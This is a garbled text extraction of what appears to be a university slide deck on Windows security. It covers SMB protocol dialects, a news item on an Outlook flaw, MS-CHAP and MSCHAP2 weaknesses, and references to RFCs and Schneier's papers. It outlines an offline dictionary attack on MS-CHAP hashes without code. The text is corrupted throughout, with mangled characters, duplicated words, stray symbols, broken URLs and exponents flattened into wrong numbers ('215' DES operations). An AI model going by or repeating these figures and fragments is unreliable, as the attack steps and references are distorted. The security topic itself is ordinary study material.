Professional Documents
Culture Documents
Gros, Charles-
Charles-Henri
Haley, David
Lisanke, Bob
Schaff, Clovis
ð
h ðverview of Windows Security Issues
h Various Protocols and Problems
h Introducing MSCHAP
h MSCHAP to MSCHAP2
h MSCHAP2 to PEAP
h Mur£
Mur £ Models
h Lessons Learned
h Wed Mar 10, 6:55 PM ET
SEATTLE (Reuters) - Microsoft Corp. (Nasdaq:MSFT - news)
upgraded a recent security warning to "critical" after
discovering new ways in which an attacker could run
malicious software on a vulnerable computer, the world's
largest software maker said on Wednesday.
The software flaw, which affects the two latest versions of
Microsoft's ðutlook e e--mail, calendar and contacts program,
were initially rated as "important" in Microsoft's monthly
security bulletin issued on Tuesday.
h Transport Layers
ƛ NetBIðS, NetBEUI, TCP/IPƦ
h Protocols on top
ƛ SMB, RPC, NetMeetingƦ
h Many dialects of protocols
ƛ SMB: PCNP1.0, LanMan 1.0/2.0,
NT LM 0.12, CIFSƦ
h Backwards compatibility between all
various dialects
h More implementations: more potential
for human error (incorrect codeƦ)
h Holes in client-
client-side code (ActiveXƦ)
h Programmer Laziness/Carelessness
h Windows empowers the user, less
restrictive environment
h Easy for the unwary user to execute
unwanted code (email virus)
h Convenience vs. Security (automatic
parsing of HTML email, etc.)
h Uneducated user = highly vulnerable
%&
%&
%
&
à
!"#
''
,)
,)
$''
$
h Cryptanalysis of MS-
MS-CHAP:
h Dictionary attack [Lðpht proved it is efficient]
ƛ ðffline: pre-
pre-computed DES encryption of each
likely values of P0ƦP6 and P7ƦP13
ƛ Given R0ƦR7 R8ƦR15 R16ƦR23 seen on link:
1. Retrieve K14 and K15 : average 215 DES ops.
2. for N2 likely values of P7ƦP13 : (DES encr. known)
K14 and K15 retrieved : N2/216 DES trials max
3. for N1 likely values of P0ƦP6:
K7 retrieved : N1/28 DES trials max
h Cryptanalysis of MS-
MS-PPE: secret key also
based on password
-ð .
$
h Creator: Mudge, Schneierƞs co-
co-author of the article
h MSCHAP1: Failure_PasswordExpired
forces bad LanMan hash to be sent
(
h According to Mur£
Mur£ however there is still a man-
man-in-
in-
the--middle attack
the
h Solution: send serverƞs name in the hash
h MSCHAP2 still depends on password integrity!
h RFCs
ƛ http://www.zvon.org/tmRFC/RFC2759/ðutput/index.html
ƛ http://www.zvon.org/tmRFC/RFC2433/ðutput/index.html
ƛ http://www.zvon.org/tmRFC/RFC1994/ðutput/index.html
h Schneier papers:
ƛ http://www.schneier.com/paper-
http://www.schneier.com/paper-pptp.html
ƛ http://www.schneier.com/paper
http://www.schneier.com/paper--pptpv2.html
1
.
h MS Knowledge Base
ƛ Articles 297816, 285189, 297840, 297818
h MSDN:
ƛ http://msdn.microsoft.com/library/en-
http://msdn.microsoft.com/library/en-us/wceeap/html/
cxconextensibleauthenticationprotocol.asp
h SMB/CIFS:
SMB?, Richard Sharpe, 2002,
ƛ What is SMB?,
http://samba.org/cifs/docs/what--is
http://samba.org/cifs/docs/what is--smb.html
CIFS, Christopher R. Hertel, 2003,
ƛ Implementing CIFS,
http://www.ubiqx.org/cifs/